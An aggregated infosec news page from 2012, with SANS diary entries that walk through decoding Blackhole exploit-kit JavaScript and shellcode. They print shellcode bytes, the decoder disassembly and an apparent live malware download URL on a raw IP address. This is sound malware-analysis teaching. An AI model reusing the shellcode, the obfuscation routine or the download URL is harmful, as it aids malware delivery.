InfoSec News

Richard Porter --- ISC Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Oracle has lost its bid to assert a third patent in its trial against Google, with a favorable decision from the U.S. Patent & Trademark Office coming "a few days too late," a judge ruled on Thursday.
Despite many competitors, Dropbox is the de facto standard for syncing files across one's own computers and sharing them with others. New features rolled out Monday extend Dropbox's reach substantially by making it possible to create a public, revocable link to any file or folder in a Dropbox sync folder. Previously, only items in a special Public folder could be shared, and the links couldn't be cancelled; the item had to be moved out of the folder.
The White House today threatened a veto of the controversial Cyber Intelligence Sharing and Protection Act (CISPA) if the bill reaches President Obama's desk in its present form.
Privacy advocates and cloud services users are concerned about Google's terms of use for its new Drive storage services, saying Google can basically do what it wants with a customer's data.
Virtualization software vendor VMware today downplayed the seriousness of a source code leak involving the company's ESX hypervisor technology.
Advanced Micro Devices gained market share on Intel in worldwide x86 processor shipments during the first quarter on the strength of mobile and desktop shipment growth, Mercury Research said Wednesday.

Facebook Enlists InfoSec Mavens for Big Malware Vaccination
By Richard Adhikari Facebook is making friends with a wide variety of top computer security companies in an effort to eradicate the malware that flows through the social network. It's compiling the companies' databases of malicious URLs in order to ...

Chilkat Zip ChilkatZip2.DLL Multiple Arbitrary File Overwrite Vulnerabilities

Let's assume you finished the analysis of Blacole's obfuscated JavaScript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in shellcode analysis is to clean it up. In the case at hand, we have to remove those spurious script tags

because they would trip us up in any of the following steps.
Once we're left with only the actual Unicode escapes (%uxxyy...), we can turn them into raw bytes. Each %u unit is a little-endian 16-bit value, so the two bytes have to be swapped on output (yy first, then xx):
$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin

$ cat decoded.bin | hexdump -C
00000000  41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  |AAAAf......X1.f.|
00000010  e9 57 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  |.W..0(@.........|
00000020  ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  |..]..w..L.h..h$.|
00000030  58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  |X4~.^ ..N.v.+\..|
00000040  a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  |..=8....h..n..].|

This doesn't result in anything all that useful yet. Shellcode is machine code, so it wouldn't be readable in a hex dump anyway. But since most shellcode just downloads and runs an executable, the URL of that EXE often shows up as a plain string. Not in this case, because the shellcode is encoded one more time :).
Next step: Disassemble.
The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shellcode into a small C program as a byte array, compile it, and then disassemble the result. Converting the raw bytes into C array syntax:
$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > decoded.c
results in
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]
(Note that Perl's . does not match a newline, so a 0x0a byte in the shellcode would be silently skipped by this one-liner; use perl -0777 -ne with the /s modifier for a fully binary-safe conversion.) This is the correct format to turn into a C source file:
$ cat decoded.c
unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] };
int main(void) { return 0; }
which in turn can be compiled (we only want the binary as a container for disassembly; there is no need to ever run it):
$ gcc -O0 -fno-inline decoded.c -o decoded.obj
which in turn can be disassembled:
$ objdump -M intel,i386 -D decoded.obj > decoded.asm
and we are left with a file decoded.asm. The -M intel,i386 option matters: the host binary is 64-bit, but the shellcode is 32-bit x86 and has to be decoded as such, and Intel syntax is easier on the eyes. -D (rather than -d) disassembles all sections, including the data section the array ends up in. The file will contain all the glue logic that this program needs to run on Unix, but we're not interested in that. The only thing we're after is the disassembled contents of the array shellcode:
0000000000600840 <shellcode>:
  600840:  41                  inc    ecx
  600841:  41                  inc    ecx
  600842:  41                  inc    ecx
  600843:  41                  inc    ecx
  600844:  66 83 e4 fc         and    sp,0xfffffffc
  600848:  fc                  cld
  600849:  eb 10               jmp    60085b <shellcode+0x1b>
  60084b:  58                  pop    eax
  60084c:  31 c9               xor    ecx,ecx
  60084e:  66 81 e9 57 fe      sub    cx,0xfe57
  600853:  80 30 28            xor    BYTE PTR [eax],0x28
  600856:  40                  inc    eax
  600857:  e2 fa               loop   600853 <shellcode+0x13>
  600859:  eb 05               jmp    600860 <shellcode+0x20>
  60085b:  e8 eb ff ff ff      call   60084b <shellcode+0xb>
  600860:  ad                  lods   eax,DWORD PTR ds:[esi]
  600861:  cc                  int3
  600862:  5d                  pop    ebp
A-Ha! Somebody is XOR-ing something here with 0x28 (the instruction at 600853). If we look at this in a bit more detail, we notice an odd combination of JMP and CALL.

Why would the code JMP to an address only to CALL back to the address right behind the original JMP? The shellcode has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of itself, it has to determine its current address. A CALL is a function call and pushes a return address onto the CPU stack. Thus, after the call at 60085b, the stack will contain 600860 as the return address. The pop eax at 60084b takes this address off the stack, so register EAX now points to 600860, the first byte behind the decoder stub. xor ecx,ecx / sub cx,0xfe57 sets CX to 0x1a9 (425), and xor BYTE PTR [eax],0x28 / inc eax / loop then walk over that many bytes of the encoded payload, XOR-ing every byte with 0x28. This JMP/CALL/POP sequence (a "GetPC" stub) is one of the most common ways for position-independent shellcode to find its own address.
Let's try the same in Perl. This XORs the whole file, including the 0x20-byte decoder stub, which is harmless since we only care about the payload behind it. The same caveat as above applies: . does not match a newline, so any 0x0a byte passes through unchanged; use perl -0777 -pe with the /s modifier if that matters.
$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin
$ hexdump -C de-xored.bin | tail -5
00000190  0e 89 6f 01 bd 33 ca 8a  5b 1b c6 46 79 36 1a 2f  |..o..3..[..Fy6./|
000001a0  70 68 74 74 70 3a 2f 2f  38 35 2e 32 35 2e 31 38  |phttp://85.25.18|
000001b0  39 2e 31 37 34 2f 71 2e  70 68 70 3f 66 3d 62 61  |9.174/q.php?f=ba|
000001c0  33 33 65 26 65 3d 31 00  00 28 25 0a              |33e&e=1..(%.|

Et voilà, we get our next stage URL.
If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.
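The same unpacking, written out as an added example in Python (this is not code from the diary, nor from any tool mentioned on this page). It does what the Perl one-liners above do, but binary-safe, and it uses the two facts the disassembly gave us, the 80 30 xx xor instruction that carries the key and the CALL whose return address marks the start of the payload, to locate the encoded payload instead of XOR-ing the whole file. The decoder stub bytes are the ones from the listing above; the payload behind them, the URL in it and the %u text with spurious script tags are constructed for this example and do not come from the real sample.

```python
import re

KEY = 0x28  # the XOR key the disassembly revealed at 600853

# The 32-byte GetPC/XOR decoder stub, taken from the listing above.
STUB = bytes.fromhex(
    "41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 "
    "e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff"
)

# Constructed payload (NOT the real one): some filler, a 0x22 byte that
# encodes to 0x0a (the byte Perl's '.' would skip), and a download URL.
PLAIN_PAYLOAD = (
    b"\x90\x90\x90\x90\x22\x00"
    b"http://example.invalid/q.php?f=test&e=1\x00"
)
SAMPLE_BYTES = STUB + bytes(b ^ KEY for b in PLAIN_PAYLOAD)


def bytes_to_unicode_escape(data: bytes) -> str:
    """Encode bytes as %uXXYY the way an exploit page carries them:
    each unit is a little-endian 16-bit value, so byte pairs are swapped."""
    if len(data) % 2:
        data += b"\x00"
    return "".join(f"%u{data[i + 1]:02x}{data[i]:02x}" for i in range(0, len(data), 2))


# Constructed stand-in for raw.js, including the spurious <script> tags
# the diary had to strip by hand before decoding.
SAMPLE_JS = (
    "<script>" + bytes_to_unicode_escape(SAMPLE_BYTES[:20]) + "</script>"
    "<script>" + bytes_to_unicode_escape(SAMPLE_BYTES[20:]) + "</script>"
)


def unicode_escape_to_bytes(text: str) -> bytes:
    """Inverse of the above. Anything that is not a %uXXYY unit (script
    tags, whitespace, quotes) is ignored, so no manual cleanup is needed."""
    units = re.findall(r"%u([0-9a-fA-F]{2})([0-9a-fA-F]{2})", text)
    return b"".join(bytes([int(lo, 16), int(hi, 16)]) for hi, lo in units)


def find_xor_key(code: bytes):
    """'xor BYTE PTR [eax],imm8' is encoded 80 30 imm8. Return imm8 of the
    first such instruction, or None. A byte-pattern heuristic, not a disassembler."""
    m = re.search(rb"\x80\x30(.)", code, re.DOTALL)
    return m.group(1)[0] if m else None


def find_payload_offset(code: bytes):
    """The stub's CALL is 'e8 rel32' with a small negative displacement
    (e8 xx ff ff ff). Its return address, the byte right after the CALL,
    is what POP EAX picks up and where the XOR loop starts."""
    m = re.search(rb"\xe8.\xff\xff\xff", code, re.DOTALL)
    return m.end() if m else None


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def decode_payload(code: bytes) -> bytes:
    """Emulate what the stub does at run time: leave the stub alone, XOR the rest."""
    key = find_xor_key(code)
    off = find_payload_offset(code)
    if key is None or off is None:
        raise ValueError("decoder stub not recognised")
    return code[:off] + xor_bytes(code[off:], key)


def extract_urls(data: bytes) -> list:
    """Pull printable http(s) URLs out of the decoded bytes."""
    return [u.decode("ascii") for u in re.findall(rb"https?://[\x21-\x7e]+", data)]


if __name__ == "__main__":
    raw = unicode_escape_to_bytes(SAMPLE_JS)
    print("key 0x%02x, payload at offset 0x%x" % (find_xor_key(raw), find_payload_offset(raw)))
    for url in extract_urls(decode_payload(raw)):
        print("next stage:", url)
```

The stub-matching functions are deliberately simple byte-pattern searches tuned to this decoder; a different exploit kit's stub (a FPU-based GetPC, a different register, a 32-bit key) would need the disassembly step again before the patterns can be adjusted.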
IBM announced new "affordable" Linux servers on Wednesday as the company tries to push its new category of preconfigured servers for virtualization and big data to midmarket and enterprise customers.
Sprint Nextel will start offering 4G WiMax service to its Boost Mobile and Virgin Mobile prepaid customers later this quarter, CEO Dan Hesse said after the company reported a net loss for the first quarter.
The Mac's contribution to Apple's bottom line fell to an all-time low last quarter, according to data from the company.
The U.S. House of Representatives has passed a bill focused on helping taxpayers track federal spending online.
The Black Hole Exploit toolkit is behind the bulk of the HTML and Java exploits, according to version 12 of the Microsoft Security Intelligence Report.

Ah, what a week it's been. Ravelling the unravelled and fixing stuff I thought was fixed.
Less than a week ago, the Internet was abuzz with reports that Facebook's IPO would come in mid-May. Today, news reports are adding several more weeks to that timeline.
With the launch of Google Drive this week, IT managers can look forward to a potential new productivity tool -- and some significant headaches, analysts say.
[SECURITY] [DSA 2460-1] asterisk security update
Multiple vulnerabilities in Piwigo
Sprint plans to stick with unlimited data plans for its smartphones, and that policy apparently will apply even if the next iPhone runs over 4G LTE, which is much faster than 3G service.
Box has given its API a makeover so that developers will have an easier time building and integrating applications with its software, and have those applications do more than is currently possible.
Joomla CCNewsLetter Module 'id' Parameter SQL Injection Vulnerability
systemd 'systemd-logind' Insecure Temporary File Handling Vulnerability
linux privileged and arbitrary chdir() (fixed at 5.4 cifs release)
[SECURITY] [DSA 2454-2] openssl incomplete fix
[SECURITY] [DSA 2548-1] iceape security update
[SECURITY] [DSA 2457-1] iceweasel security update
Apple today announced that its annual developers conference would run June 11-15 in San Francisco -- and inside of two hours, the event had sold out.
Wipro, one of India's top outsourcers, reported slow revenue growth in U.S. dollar terms for the quarter ended March 31, and issued muted guidance for the next quarter, reflecting an uncertain outsourcing market.
The new Google Drive cloud storage service offers 5GB of storage and some nice features, but it's not yet an undisputed winner.

iTWire (press release)

Conseal Security Launches Major New Release of Conseal Server
April 25th 2012 - Infosec, Stand K76 - Conseal Security, the provider of solutions to secure data on the move, today announced Conseal Server 2.0, enabling organisations to maintain complete control over their private data when it's on the move.

Microsoft has demonstrated support for the Open Document Format (ODF) 1.2 standard in a technical preview of the forthcoming Office 15 productivity suite, and plans to release a beta version with the feature late this summer.
A vulnerability in the firmware of several network-enabled Samsung TV models and possibly Blu-ray players allows potential attackers to put the vulnerable devices into an endless restart loop that requires the intervention of a technician to terminate, according to independent security researcher Luigi Auriemma.
For all of our advances in technology, getting a recommendation on what movie to watch still largely hinges on a sweater-clad film critic and the position of his thumb. Surely in this age of miracles--when a powerful computer controlled entirely by taps and swipes can fit comfortably inside a pocket--there can be a more tech-savvy solution to the age-old question of what movie to watch this evening?
Big data is fueling the need for ever-growing storage repositories. If you're looking to meet scalability concerns without breaking the bank, selecting a storage platform that can meet the needs of big data can be a challenge--but it doesn't have to be an overwhelming one.
Apple today announced that its annual developers conference would run June 11-15 in San Francisco.

Help Net Security

InfoSec: Hackers hit record number of UK businesses
In a report launched in time for this year's InfoSec event in London, PwC states that one in seven large UK businesses was hacked last year. The average such business faces a significant attack every week. But while the risks are heightening, ...
Security breaches costing UK firms billions (MicroScope blog)

Windows Phone can now be targeted by PhoneGap Build, a cloud-based service for creating cross-platform mobile phone apps, according to a Tuesday blog post from Nitobi, the service's creators.

Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the evolution of code obfuscation that the bad guys went through.
Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe Reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.
Often, this actually works. The current wave of Blackhole (Blacole) exploit kits is a good example: it took anti-virus vendors a long time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 detections on VirusTotal.

Here's what the Blacole obfuscated Javascript looks like:

Unlike older obfuscation methods, this Blacole encoding is almost human-readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:

None of this will run in command-line JavaScript interpreters like SpiderMonkey. Analysis environments like Cuckoo and Wepawet do a pretty good job at this, but often also trip up.
If all else fails, manual analysis of the code is tedious, but it usually leads to the desired result. A bit further down in the JavaScript block, we find

This looks like a loop over the code block that substitutes characters based on their ASCII code. If the ASCII code is > 25 and < 52, 26 gets added to it. If it is >= 52 and < 78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a poor man's Caesar cipher that swaps the two ranges 26-51 and 52-77 against each other, which also means the same routine both obfuscates and de-obfuscates.
Something we can readily reproduce in a couple lines of Perl :)
$ cat decode.pl

#!/usr/bin/perl -w
# Undo the Blacole character swap: codes 26..51 move up by 26,
# codes 52..77 move down by 26, everything else (including CR/LF,
# so line-by-line processing is safe) stays as it is.
while (<>) {
    for ($i = 0; $i < length($_); $i++) {
        $o = ord(substr($_, $i, 1));
        if (($o > 25) && ($o < 52)) {
            $o += 26;
        } elsif (($o >= 52) && ($o < 78)) {
            $o -= 26;
        }
        print chr($o);
    }
}
And, lo and behold:
$ cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.
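The character swap from the loop above, as an added Python example (not from the diary; decode.pl is the diary's own script). It shows the one property worth checking before relying on the decoder: because the two ranges are simply exchanged, the routine is an involution, so the same code both obfuscates and de-obfuscates, and bytes outside 26..77 (CR and LF among them) pass through untouched, which is why a line-by-line loop is safe here. The sample snippet is constructed for this example, not taken from the real Blacole script.

```python
# Build the translation table once: 26..51 -> 52..77 and 52..77 -> 26..51,
# the same rule as decode.pl (code > 25 and < 52 gains 26, >= 52 and < 78 loses 26).
_SWAP = {c: c + 26 for c in range(26, 52)}
_SWAP.update({c: c - 26 for c in range(52, 78)})
_TABLE = str.maketrans({chr(k): chr(v) for k, v in _SWAP.items()})


def blacole_swap(text: str) -> str:
    """Apply the Blacole range swap to a string; characters outside the
    two ranges are returned unchanged."""
    return text.translate(_TABLE)


def is_involution(text: str) -> bool:
    """Applying the swap twice must give back the input, which is what
    lets one script serve as both obfuscator and de-obfuscator."""
    return blacole_swap(blacole_swap(text)) == text


def untouched_chars(text: str) -> set:
    """Characters the swap leaves alone; CR and LF are always among them,
    so the line structure of the script survives the transformation."""
    return {ch for ch in text if blacole_swap(ch) == ch}


# Constructed sample: a plain snippet 'obfuscated' with the very same routine.
SAMPLE_PLAIN = 'document.write("<iframe src=\'http://example.invalid/q.php\'>");\n'
SAMPLE_OBFUSCATED = blacole_swap(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(SAMPLE_OBFUSCATED, end="")
    print(blacole_swap(SAMPLE_OBFUSCATED), end="")
```

Because lowercase letters (97..122) are outside both ranges, keywords like document and write survive the swap unchanged, which is why this layer looks "almost human-readable" while the punctuation, digits and uppercase letters that make up URLs and markup are scrambled.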

EU Commissioner Kroes demands security investment at Infosec
By Mikael Ricknäs | IDG News Service | Published 01:50, 25 April 12 Neelie Kroes, the European Union's digital agenda commissioner, wants to use funds from the EU budget to invest in security technologies, and also called for more transparency in the ...

A top Chinese microblogging site has closed several user accounts for allegedly spreading political rumors, part of an ongoing government-backed campaign to scrub social networking sites of sensitive political talk.
Chinese handset maker Huawei Technologies expects its smartphone chip business will help further drive revenue, signaling that the company could try to compete in the worldwide mobile chip market.
Apple on Tuesday announced record first-quarter revenue on the back of soaring iPhone sales, with an assist from the iPad.
Asus in 2011 became one of the top five tablet makers, and though it still lags somewhat behind the market leaders, analysts say its influence on the market is clearly on the rise.

TechWeekEurope UK

Infosec: Raising Awareness Is The Best Cyber Defence
The InfoSec show is being held for three days starting on Tuesday at London's Earls Court Exhibition Centre and Security B-Sides, a competing conference, at the Barbican, also in London. The shortage of security staff needs to be addressed by academia ...



Infosec: Government urges companies to reveal cyberattacks
By Anh Nguyen April 25, 2012 — Computerworld UK — David Willetts, minister of state for universities and science, has called for businesses to disclose their experiences of successful and unsuccessful cyberattacks. He believes that this will help to ...
David Willetts: UK firms need to 'fess up to security boobs (The Register)


Wannabe infosec kingpins: Forget tech, grab a clipboard
By Phil Muncaster. Budding chief information security officers (CISOs) would be better off boning up on business, communication, and risk management skills than getting bogged down in detailed discussions about technology, ...


SSH firm aims to untangle crypto key hairball
By John Leyden. Infosec 2012 Secure Shell (SSH) certificate management – a key internet protocol used for remote access and file transfer for nearly 20 years now – can become quite a tangled issue if there isn't a clear ...


Cloudy crypto SSO firm: Passwords must go
By John Leyden. Infosec 2012 Cloudy crypto firm Ping Identity is pushing the benefits of using cloud-based technologies to reduce, and perhaps even eliminate, password headaches. The firm is using the Infosec show to promote ...

Chinese handset maker Huawei Technologies expects its smartphone chip business will help further drive revenue, signaling that the company could try to compete in the world's mobile chip market.
Business software vendor SAP expects software and software-related service revenue to increase in the range of 10 to 12 percent at constant currencies during the year, largely in line with preliminary estimates that the company released earlier this month.

IBM Announces New Threat Analytics to Help Organizations Better Identify ...
NEWS.GNOM.ES (press release)
INFOSEC — IBM (NYSE: IBM) today unveiled new analytics using advanced security intelligence that can flag suspicious behavior in network activities to help better defend against hidden threats facing organizations. As organizations open up ...


ComputerWeekly.com (blog)

Infosec: IBM debuts anomaly detection system
Vendor claims latest product will protect end users from new breed of "subtle and sophisticated" hackers. By Caroline Donnelly, 25 Apr 2012 at 06:01 Vendor giant IBM claims traditional firewalls and anti-virus products are no match for the increasingly ...
IBM at InfoSec: security megatrends for application development (ComputerWeekly.com blog)
IBM Announces New Threat Analytics to Help Organizations Better Identify ... (Sacramento Bee)


Posted by InfoSec News on Apr 24


By Robert Lemos
Contributing Writer
Dark Reading
April 24, 2012

The recipe for a cyberattack is straightforward: Attackers gather
intelligence on the target's systems, research vulnerabilities, exploit
those weaknesses, gain control of the systems, and conduct
post-exploitation operations.

Yet, for...

Posted by InfoSec News on Apr 24


By Kevin McLaughlin
April 24, 2012

VMware's ESX hypervisor source code leak may stem from an attack on a
Chinese import-export firm last month in which an anonymous hacker
claims to have made off with more than one terabyte of confidential

On Tuesday, Kaspersky Lab's Threatpost blog reported the details of its...

Posted by InfoSec News on Apr 24


By Ken Terry
April 24, 2012

For the second time in less than a month, there has been a major data
security breach at a state Medicaid agency. The South Carolina
Department of Health and Human Services (SCDHHS) discovered on April 10
that an employee of the state's Medicaid program had transferred
personal information of 228,435 Medicaid...

Posted by InfoSec News on Apr 24


By Alice Lipowicz
April 23, 2012

Iris recognition technology used to identify an individual from a crowd
is accurate 90 percent to 99 percent of the time, according to a new
report from the National Institute of Standards & Technology (NIST).

NIST’s Iris Exchange III report also found some trade-offs between
accuracy and speed, the April 16 final report indicated....

Posted by InfoSec News on Apr 24


By John Leyden
The Register
24th April 2012

Infosec 2012 - Hackers are increasingly turning to automated software
tools to launch attacks.

According to research from Imperva, more than 60 per cent of SQL
injection attacks and as many as 70 per cent of Remote File Inclusion
attacks (the two most common attack types) are automated. Remote File
Inclusion attacks allow hackers to plant...